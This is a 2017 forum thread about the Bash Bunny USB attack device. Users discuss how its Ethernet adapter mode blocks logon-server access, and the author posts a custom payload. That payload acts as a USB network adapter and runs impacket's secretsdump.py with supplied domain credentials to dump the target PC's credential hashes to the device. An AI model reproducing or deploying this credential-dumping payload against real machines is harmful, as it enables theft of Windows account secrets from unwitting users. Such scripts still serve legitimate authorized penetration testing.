Altecheon, posted April 14, 2017

I understand that part of the plan for the BB was Man in the Middle attacks, which is why I am running into an issue with one of the payloads I am playing around with. In an enterprise environment the system, unless it's a laptop, may not cache credentials that you may have obtained. This being said, if the user is not currently logged into the machine or has not logged in for a while, the system will attempt to reach out to a login server. If the BB is the route the system takes to reach the internet, then the computer will throw an error like this:

    "SMB SessionError: STATUS_NO_LOGON_SERVERS(No logon servers are currently available to service the logon request.)"

All of that being said, I think a feature that may be helpful would be to allow for configuration of the Ethernet modes. This would allow you to set the connection to slower than most networks, or maybe having no connection to the internet. This would also help when you do not wish to interrupt internet connectivity for the device. I cannot say that you cannot configure this already, but I can say I do not know how to configure this and that I am curious as to how I would do this.
LowValueTarget, posted April 14, 2017

As far as I understand at the moment, when the BB is plugged into a host machine and is acting as an ethernet adapter (RNDIS_ETHERNET, ECM_ETHERNET), it generally registers as the fastest (2GBps) and defaults to the primary interface. That being said, when the BB is the primary interface, it does not have internet access, nor does the host machine utilizing it.

What payload are you working with that is having issues? Is it a custom payload? Can you share it?
Altecheon (author), posted April 14, 2017

It is a custom payload using impacket at the old firmware location. It assumes that you know the domain/user and password to pull credentials from a PC. If the account is cached, it executes, but if not it fails due to contacting the login server. I have also figured out that the use of an @ or a colon in a password causes issues for the impacket code.

    USER=domain/Genericuser
    PASS=GenericPassword

    LED R SLOW
    ATTACKMODE RNDIS_ETHERNET

    GET TARGET_HOSTNAME
    GET TARGET_IP

    # if the target does not get an IP, give the fail LED and stop
    if [ -z "${TARGET_IP}" ]; then
        LED R 100
        exit 1
    fi

    cd /pentest/impacket/examples
    if [ ! -d "temp" ]; then
        mkdir temp
    fi

    # stray "$temp/" removed from the output path; variables quoted so the
    # hostname and credentials reach the command as single arguments
    python secretsdump.py "$USER:$PASS@$TARGET_IP" -outputfile "temp/$TARGET_HOSTNAME" > "temp/$TARGET_HOSTNAME.outputfile"
    sync

    LED G SLOW